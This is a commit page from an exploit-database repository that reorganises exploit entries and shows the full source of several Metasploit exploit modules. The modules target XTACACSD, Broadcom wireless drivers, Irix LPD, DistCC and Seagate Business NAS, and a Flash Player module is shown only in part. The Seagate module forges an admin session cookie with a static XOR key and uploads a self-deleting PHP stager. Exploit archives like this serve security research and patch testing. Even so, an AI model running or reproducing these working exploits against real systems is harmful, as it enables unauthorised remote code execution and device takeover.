Western Digital Arkeia - Remote Code Execution (Metasploit) (2)
Western Digital Arkeia < 11.0.12 - Remote Code Execution (Metasploit)

Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1)

E-Uploader Pro 1.0 - Image Upload with Code Execution
E-Uploader Pro 1.0 - Image Upload / Code Execution

ASPapp Knowledge Base - 'CatId' Parameter SQL Injection
ASPapp Knowledge Base - 'CatId' Parameter SQL Injection (1)

ASPapp KnowledgeBase - 'catid' Parameter SQL Injection
ASPapp Knowledge Base - 'CatId' Parameter SQL Injection (2)

ea-gBook 0.1 - Remote Command Execution with Remote File Inclusion (c99)
ea-gBook 0.1 - Remote Command Execution / Remote File Inclusion (c99)

Flatchat 3.0 - 'pmscript.php with' Local File Inclusion
Flatchat 3.0 - 'pmscript.php' Local File Inclusion

Joomla! Component huruhelpdesk - SQL Injection
Joomla! Component Huru Helpdesk - SQL Injection (1)

PGAUTOPro - SQL Injection / Cross-Site Scripting
PGAUTOPro - SQL Injection / Cross-Site Scripting (1)

Joomla! Component Huru Helpdesk - SQL Injection
Joomla! Component Huru Helpdesk - SQL Injection (2)

SoftwareDEP Classified Script 2.5 - SQL Injection
SoftwareDEP Classified Script 2.5 - SQL Injection (1)

WordPress Plugin pay with tweet 1.1 - Multiple Vulnerabilities
WordPress Plugin Pay with Tweet 1.1 - Multiple Vulnerabilities

Software DEP Classified Script 2.5 - SQL Injection
SoftwareDEP Classified Script 2.5 - SQL Injection (2)
Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (1)
Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (2)
Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (1)
Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (2)

OnlineArts DailyDose 1.1 - Denial of Servicee.pl Remote Command Execution
OnlineArts DailyDose 1.1 - 'dose.pl' Remote Command Execution
PHPOpenChat 2.3.4/3.0.1 - PoC_loginform.php phpbb_root_path Parameter Remote File Inclusion
PHPOpenChat 2.3.4/3.0.1 - PoC.php Remote File Inclusion
PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php' phpbb_root_path Parameter Remote File Inclusion
PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion

ActiveNews Manager - 'articleId' Parameter SQL Injection
ActiveNews Manager - 'articleId' Parameter SQL Injection (1)

Active News Manager - 'articleId' Parameter SQL Injection
ActiveNews Manager - 'articleId' Parameter SQL Injection (2)

Sagem Fast 3304-V2 - Authentication Bypass
Sagem Fast 3304-V2 - Authentication Bypass (1)

PG Auto Pro - SQL Injection / Cross-Site Scripting
PGAUTOPro - SQL Injection / Cross-Site Scripting (2)

Sagem FAST3304-V2 - Authentication Bypass
Sagem FAST3304-V2 - Authentication Bypass (2)

Trend Micro - Multiple HTTP Problems with CoreServiceShell.exe
Trend Micro - 'CoreServiceShell.exe' Multiple HTTP Issues

phpATM 1.32 - Arbitrary File Upload / Remote Command Execution (Windows Servers)
phpATM 1.32 (Windows) - Arbitrary File Upload / Remote Command Execution

Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)
This commit is contained in:
Offensive Security 2017-04-02 05:01:18 +00:00
parent 52fd3d8a20
commit 0320cba051
50 changed files with 1005 additions and 3974 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

440
files.csv
View file

File diff suppressed because it is too large Load diff

31
platforms/bsd/remote/10035.rb
View file

@ -1,9 +1,9 @@
##
# $Id$
# $Id: xtacacsd_report.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -11,8 +11,8 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Brute
@ -21,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'XTACACSD <= 4.1.2 report() Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in XTACACSD <= 4.1.2. By
sending a specially crafted XTACACS packet with an overly long
username, an attacker may be able to execute arbitrary code.
This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By
sending a specially crafted XTACACS packet with an overly long
username, an attacker may be able to execute arbitrary code.
},
'Author' => 'MC',
'Version' => '$Revision$',
'References' =>
[
'Version' => '$Revision: 9262 $',
'References' =>
[
['CVE', '2008-7232'],
['OSVDB', '58140'],
['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'],
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNops' => 'True',
},
'Platform' => 'BSD',
'Arch' => ARCH_X86,
'Arch' => ARCH_X86,
'Targets' =>
[
['FreeBSD 6.2-Release Bruteforce',
@ -59,8 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 8 2008'))
register_options([Opt::RPORT(49)], self.class)
register_options([Opt::RPORT(49)], self.class)
end
def brute_exploit(address)
@ -80,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote
sploit << "\x00\x00\x00\x00" # Result 2
sploit << "\x00\x00" # Result 3
sploit << make_nops(238 - payload.encoded.length)
sploit << payload.encoded + [address['Ret']].pack('V')
sploit << payload.encoded + [address['Ret']].pack('V')
print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...")
print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...")
udp_sock.put(sploit)
disconnect_udp
disconnect_udp
end
end

90
platforms/freebsd/remote/16879.rb
View file

@ -1,90 +0,0 @@
##
# $Id: xtacacsd_report.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'XTACACSD <= 4.1.2 report() Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By
sending a specially crafted XTACACS packet with an overly long
username, an attacker may be able to execute arbitrary code.
},
'Author' => 'MC',
'Version' => '$Revision: 9262 $',
'References' =>
[
['CVE', '2008-7232'],
['OSVDB', '58140'],
['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'],
],
'Payload' =>
{
'Space' => 175,
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
'StackAdjustment' => -3500,
'PrependEncoder' => "\x83\xec\x7f",
'DisableNops' => 'True',
},
'Platform' => 'BSD',
'Arch' => ARCH_X86,
'Targets' =>
[
['FreeBSD 6.2-Release Bruteforce',
{'Bruteforce' =>
{
'Start' => { 'Ret' => 0xbfbfea00 },
'Stop' => { 'Ret' => 0xbfbfef00 },
'Step' => 24,
}
},
],
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 8 2008'))
register_options([Opt::RPORT(49)], self.class)
end
def brute_exploit(address)
connect_udp
sploit = "\x80" # Version
sploit << "\x05" # Type: Connect
sploit << "\xff\xff" # Nonce
sploit << "\xff" # Username length
sploit << "\x00" # Password length
sploit << "\x00" # Response
sploit << "\x00" # Reason
sploit << "\xff\xff\xff\xff" # Result 1
sploit << "\xff\xff\xff\xff" # Destination address
sploit << "\xff\xff" # Destination port
sploit << "\xff\xff" # Line
sploit << "\x00\x00\x00\x00" # Result 2
sploit << "\x00\x00" # Result 3
sploit << make_nops(238 - payload.encoded.length)
sploit << payload.encoded + [address['Ret']].pack('V')
print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...")
udp_sock.put(sploit)
disconnect_udp
end
end

206
platforms/hardware/remote/16387.rb
View file

@ -1,206 +0,0 @@
##
# $Id: broadcom_wifi_ssid.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = LowRanking
include Msf::Exploit::Lorcon2
include Msf::Exploit::KernelMode
def initialize(info = {})
super(update_info(info,
'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Broadcom Wireless driver
that allows remote code execution in kernel mode by sending a 802.11 probe
response that contains a long SSID. The target MAC address must
be provided to use this exploit. The two cards tested fell into the
00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' =>
[
'Chris Eagle', # initial discovery
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>', # the man with the plan
'skape', # windows kernel ninjitsu and debugging
'hdm' # porting the C version to ruby
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
['CVE', '2006-5882'],
['OSVDB', '30294'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500
},
'Platform' => 'win',
'Targets' =>
[
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
[ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10',
{
'Ret' => 0x8066662c, # jmp edi
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dbb27,
}
}
}
],
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
[ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10',
{
'Ret' => 0x804f16eb, # jmp edi
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dc0c7,
}
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 11 2006'
))
register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
], self.class)
end
def exploit
open_wifi
stime = Time.now.to_i
print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...")
while (stime + datastore['RUNTIME'].to_i > Time.now.to_i)
select(nil, nil, nil, 0.02)
wifi.write(create_response)
select(nil, nil, nil, 0.01)
wifi.write(create_beacon)
break if session_created?
end
print_status("Finished sending frames...")
end
def create_beacon
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
dst = eton('FF:FF:FF:FF:FF:FF')
seq = [Time.now.to_i % 4096].pack('n')
blob = create_frame
blob[0,1] = 0x80.chr
blob[4,6] = dst
blob[10,6] = src
blob[16,6] = src
blob[22,2] = seq
blob
end
def create_response
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
dst = eton(datastore['ADDR_DST'])
seq = [Time.now.to_i % 256].pack('n')
blob = create_frame
blob[0,1] = 0x50.chr
blob[4,6] = dst
blob[10,6] = src
blob[16,6] = src # bssid field, good idea to set to src.
blob[22,2] = seq
blob
end
def create_frame
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
"\x58\x58\x58\x58\x58\x58" + # src
"\x58\x58\x58\x58\x58\x58" + # bssid
"\x70\xed" + # sequence number
#
# fixed parameters
#
# timestamp value
rand_text_alphanumeric(8) +
"\x64\x00" + # beacon interval
"\x11\x04" + # capability flags
#
# tagged parameters
#
# ssid tag
"\x00" + # tag: SSID parameter set
"\x5d" + # len: length is 93 bytes
# jump into the payload
"\x89\xf9" + # mov edi, ecx
"\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b
"\xff\xe1" + # jmp ecx
# padding
rand_text_alphanumeric(79) +
# return address
[target.ret].pack('V') +
# vendor specific tag
"\xdd" + # wpa
"\xff" + # big as we can make it
# the kernel-mode stager
payload.encoded
end
end

33
platforms/irix/remote/10033.rb
View file

@ -1,32 +1,31 @@
##
# $Id$
# $Id: tagprinter_exec.rb 10561 2010-10-06 00:53:45Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Irix LPD tagprinter Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution flaw in
the in.lpd service shipped with all versions of Irix.
This module exploits an arbitrary command execution flaw in
the in.lpd service shipped with all versions of Irix.
},
'Author' => [ 'optyx', 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Version' => '$Revision: 10561 $',
'References' =>
[
['CVE', '2001-0800'],
@ -45,18 +44,18 @@ class Metasploit3 < Msf::Exploit::Remote
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet',
}
},
'Targets' =>
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DisclosureDate' => 'Sep 01 2001',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(515)
], self.class)
register_options(
[
Opt::RPORT(515)
], self.class)
end
def check
@ -64,14 +63,14 @@ class Metasploit3 < Msf::Exploit::Remote
sock.put("T;uname -a;\n")
resp = sock.get_once
disconnect
if (resp =~ /IRIX/)
print_status("Response: #{resp.strip}")
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
sock.put("T;#{payload.encoded};\n")

81
platforms/irix/remote/16877.rb
View file

@ -1,81 +0,0 @@
##
# $Id: tagprinter_exec.rb 10561 2010-10-06 00:53:45Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Irix LPD tagprinter Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution flaw in
the in.lpd service shipped with all versions of Irix.
},
'Author' => [ 'optyx', 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10561 $',
'References' =>
[
['CVE', '2001-0800'],
['OSVDB', '8573'],
['URL', 'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
],
'Privileged' => false,
'Platform' => ['unix', 'irix'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 512,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet',
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DisclosureDate' => 'Sep 01 2001',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(515)
], self.class)
end
def check
connect
sock.put("T;uname -a;\n")
resp = sock.get_once
disconnect
if (resp =~ /IRIX/)
print_status("Response: #{resp.strip}")
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
sock.put("T;#{payload.encoded};\n")
handler
print_status("Payload: #{payload.encoded}")
end
end

0
platforms/linux/local/36388.py → platforms/linux/dos/36388.py
View file

132
platforms/linux/remote/16919.rb
View file

@ -1,132 +0,0 @@
##
# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'DistCC Daemon Command Execution',
'Description' => %q{
This module uses a documented security weakness to execute
arbitrary commands on any system running distccd.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'CVE', '2004-2687'],
[ 'OSVDB', '13378' ],
[ 'URL', 'http://distcc.samba.org/security.html'],
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 01 2002'
))
register_options(
[
Opt::RPORT(3632)
], self.class)
end
def exploit
connect
distcmd = dist_cmd("sh", "-c", payload.encoded);
sock.put(distcmd)
dtag = rand_text_alphanumeric(10)
sock.put("DOTI0000000A#{dtag}\n")
res = sock.get_once(24, 5)
if !(res and res.length == 24)
print_status("The remote distccd did not reply to our request")
disconnect
return
end
# Check STDERR
res = sock.get_once(4, 5)
res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0]
return if not len
if (len > 0)
res = sock.get_once(len, 5)
res.split("\n").each do |line|
print_status("stderr: #{line}")
end
end
# Check STDOUT
res = sock.get_once(4, 5)
res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0]
return if not len
if (len > 0)
res = sock.get_once(len, 5)
res.split("\n").each do |line|
print_status("stdout: #{line}")
end
end
handler
disconnect
end
# Generate a distccd command
def dist_cmd(*args)
# Convince distccd that this is a compile
args.concat(%w{# -c main.c -o main.o})
# Set distcc 'magic fairy dust' and argument count
res = "DIST00000001" + sprintf("ARGC%.8x", args.length)
# Set the command arguments
args.each do |arg|
res << sprintf("ARGV%.8x%s", arg.length, arg)
end
return res
end
end

353
platforms/linux/webapps/41678.rb
View file

@ -1,353 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Seagate Business NAS Unauthenticated Remote Command Execution',
'Description' => %q{
Some Seagate Business NAS devices are vulnerable to command execution via a local
file include vulnerability hidden in the language parameter of the CodeIgniter
session cookie. The vulnerability manifests in the way the language files are
included in the code on the login page, and hence is open to attack from users
without the need for authentication. The cookie can be easily decrypted using a
known static encryption key and re-encrypted once the PHP object string has been
modified.
This module has been tested on the STBN300 device.
},
'Author' => [
'OJ Reeves <oj[at]beyondbinary.io>' # Discovery and Metasploit module
],
'References' => [
['CVE', '2014-8684'],
['CVE', '2014-8686'],
['CVE', '2014-8687'],
['EDB', '36202'],
['URL', 'http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/'],
['URL', 'https://beyondbinary.io/advisory/seagate-nas-rce/']
],
'DisclosureDate' => 'Mar 01 2015',
'Privileged' => true,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Payload' => {'DisableNops' => true},
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'License' => MSF_LICENSE
))
register_options([
OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
OptString.new('ADMINACCOUNT', [true, 'Name of the NAS admin account', 'admin']),
OptString.new('COOKIEID', [true, 'ID of the CodeIgniter session cookie', 'ci_session']),
OptString.new('XORKEY', [true, 'XOR Key used for the CodeIgniter session', '0f0a000d02011f0248000d290d0b0b0e03010e07'])
])
end
#
# Write a string value to a serialized PHP object without deserializing it first.
# If the value exists it will be updated.
#
def set_string(php_object, name, value)
prefix = "s:#{name.length}:\"#{name}\";s:"
if php_object.include?(prefix)
# the value already exists in the php blob, so update it.
return php_object.gsub("#{prefix}\\d+:\"[^\"]*\"", "#{prefix}#{value.length}:\"#{value}\"")
end
# the value doesn't exist in the php blob, so create it.
count = php_object.split(':')[1].to_i + 1
php_object.gsub(/a:\d+(.*)}$/, "a:#{count}\\1#{prefix}#{value.length}:\"#{value}\";}")
end
#
# Findez ze holez!
#
def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri),
'method' => 'GET',
'headers' => {
'Accept' => 'text/html'
}
)
if res && res.code == 200
headers = res.to_s
# validate headers
if headers.include?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28')
# and make sure that the body contains the title we'd expect
if res.body.include?('Login to BlackArmor')
return Exploit::CheckCode::Appears
end
end
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
# something went wrong, assume safe.
end
Exploit::CheckCode::Safe
end
#
# Executez ze sploitz!
#
def exploit
# Step 1 - Establish a session with the target which will give us a PHP object we can
# work with.
begin
print_status("Establishing session with target ...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri),
'method' => 'GET',
'headers' => {
'Accept' => 'text/html'
}
})
if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/
cookie_value = $1.strip
else
fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
end
# Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly
# then update it so that it's an admin session before re-encrypting
print_status("Upgrading session to administrator ...")
php_object = decode_cookie(cookie_value)
vprint_status("PHP Object: #{php_object}")
admin_php_object = set_string(php_object, 'is_admin', 'yes')
admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT'])
vprint_status("Admin PHP object: #{admin_php_object}")
admin_cookie_value = encode_cookie(admin_php_object)
# Step 3 - Extract the current host configuration so that we don't lose it.
host_config = nil
# This time value needs to be consistent across calls
config_time = ::Time.now.to_i
begin
print_status("Extracting existing host configuration ...")
res = send_request_cgi(
'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'),
'method' => 'GET',
'headers' => {
'Accept' => 'text/html'
},
'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
'vars_get' => {
'_' => config_time
}
)
if res && res.code == 200
res.body.split("\r\n").each do |l|
if l.include?('general_setup')
host_config = l
break
end
end
else
fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
end
print_good("Host configuration extracted.")
vprint_status("Host configuration: #{host_config}")
# Step 4 - replace the host device description with a custom payload that can
# be used for LFI. We have to keep the payload small because of size limitations
# and we can't put anything in with '$' in it. So we need to make a simple install
# payload which will write a required payload to disk that can be executes directly
# as the last part of the payload. This will also be self-deleting.
param_id = rand_text_alphanumeric(3)
# There are no files on the target file system that start with an underscore
# so to allow for a small file size that doesn't collide with an existing file
# we'll just prefix it with an underscore.
payload_file = "_#{rand_text_alphanumeric(3)}.php"
installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));"
stager = Rex::Text.encode_base64(installer)
stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>")
vprint_status("Stager: #{stager}")
# Butcher the XML directly rather than attempting to use REXML. The target XML
# parser is way to simple/flaky to deal with the proper stuff that REXML
# spits out.
desc_start = host_config.index('" description="') + 15
desc_end = host_config.index('"', desc_start)
xml_payload = host_config[0, desc_start] +
stager + host_config[desc_end, host_config.length]
vprint_status(xml_payload)
# Step 5 - set the host description to the stager so that it is written to disk
print_status("Uploading stager ...")
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
'method' => 'POST',
'headers' => {
'Accept' => 'text/html'
},
'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
'vars_get' => {
'_' => config_time
},
'vars_post' => {
'general_setup' => xml_payload
}
)
unless res && res.code == 200
fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).")
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).")
end
print_good("Stager uploaded.")
# Step 6 - Invoke the stage, passing in a self-deleting php script body.
print_status("Executing stager ...")
payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00")
payload_cookie_value = encode_cookie(payload_php_object)
self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>"
errored = false
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri),
'method' => 'POST',
'headers' => {
'Accept' => 'text/html'
},
'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}",
'vars_post' => {
param_id => Rex::Text.encode_base64(self_deleting_payload)
}
)
if res && res.code == 200
print_good("Stager execution succeeded, payload ready for execution.")
else
print_error("Stager execution failed (invalid result).")
errored = true
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
print_error("Stager execution failed (unable to establish connection).")
errored = true
end
# Step 7 - try to restore the previous configuration, allowing exceptions
# to bubble up given that we're at the end. This step is important because
# we don't want to leave a trail of junk on disk at the end.
print_status("Restoring host config ...")
res = send_request_cgi(
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
'method' => 'POST',
'headers' => {
'Accept' => 'text/html'
},
'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
'vars_get' => {
'_' => config_time
},
'vars_post' => {
'general_setup' => host_config
}
)
# Step 8 - invoke the installed payload, but only if all went to plan.
unless errored
print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...")
res = send_request_cgi(
'uri' => normalize_uri(target_uri, payload_file),
'method' => 'GET',
'headers' => {
'Accept' => 'text/html'
},
'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}"
)
end
end
#
# Take a CodeIgnitor cookie and pull out the PHP object using the XOR
# key that we've been given.
#
def decode_cookie(cookie_content)
cookie_value = Rex::Text.decode_base64(URI.decode(cookie_content))
pass = xor(cookie_value, datastore['XORKEY'])
result = ''
(0...pass.length).step(2).each do |i|
result << (pass[i].ord ^ pass[i + 1].ord).chr
end
result
end
#
# Take a serialised PHP object cookie value and encode it so that
# CodeIgniter thinks it's legit.
#
def encode_cookie(cookie_value)
rand = Rex::Text.sha1(rand_text_alphanumeric(40))
block = ''
(0...cookie_value.length).each do |i|
block << rand[i % rand.length]
block << (rand[i % rand.length].ord ^ cookie_value[i].ord).chr
end
cookie_value = xor(block, datastore['XORKEY'])
cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value))
vprint_status("Cookie value: #{cookie_value}")
cookie_value
end
#
# XOR a value against a key. The key is cycled.
#
def xor(string, key)
result = ''
string.bytes.zip(key.bytes.cycle).each do |s, k|
result << (s ^ k)
end
result
end
#
# Simple XML substitution because the target XML handler isn't really
# full blown or smart.
#
def xml_encode(str)
str.gsub(/</, '<').gsub(/>/, '>')
end
end

0
platforms/multiple/local/41682.rb → platforms/multiple/local/30474.rb
View file

191
platforms/multiple/local/41681.rb
View file

@ -1,191 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser
encoded audio inside a FLV video, as exploited in the wild on June 2015. This module
has been tested successfully on:
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.
Note that this exploit is effective against both CVE-2015-3113 and the
earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
to the same root cause as CVE-2015-3043.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-3043'],
['CVE', '2015-3113'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],
['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],
['URL', 'http://bobao.360.cn/learning/detail/357.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
